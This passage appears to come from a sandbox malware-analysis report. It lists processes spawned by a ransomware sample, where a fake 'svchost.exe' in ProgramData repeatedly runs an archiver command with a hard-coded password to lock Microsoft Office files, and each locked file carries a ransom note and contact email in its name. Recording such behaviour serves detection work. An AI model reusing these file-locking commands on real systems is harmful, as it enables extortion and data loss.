  PID:5372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4028
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\MANIFEST.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\MANIFEST.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\DSMESSAGES.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\DSMESSAGES.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\PGOMESSAGES.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\PGOMESSAGES.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SFMESSAGES.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SFMESSAGES.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNote-PipelineConfig.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNote-PipelineConfig.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\ONENOTE.VisualElementsManifest.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\ONENOTE.VisualElementsManifest.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\osfFPA\addins.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\osfFPA\addins.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\OUTLFLTR.DAT(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\OUTLFLTR.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL010.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL010.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL012.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL012.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4344
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL016.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL016.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL020.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL020.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL026.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL026.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2392
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL027.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL027.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL044.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL044.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL054.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL054.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL058.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL058.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL075.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL075.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL077.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL077.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL078.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL078.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2136
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL081.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL081.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL082.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL082.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2364
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:32
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL086.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL086.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL087.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL089.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL089.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL092.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL092.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL093.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL093.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL095.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL095.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL096.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL096.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4356
- C:\ProgramData\msvkp\svchost.exe
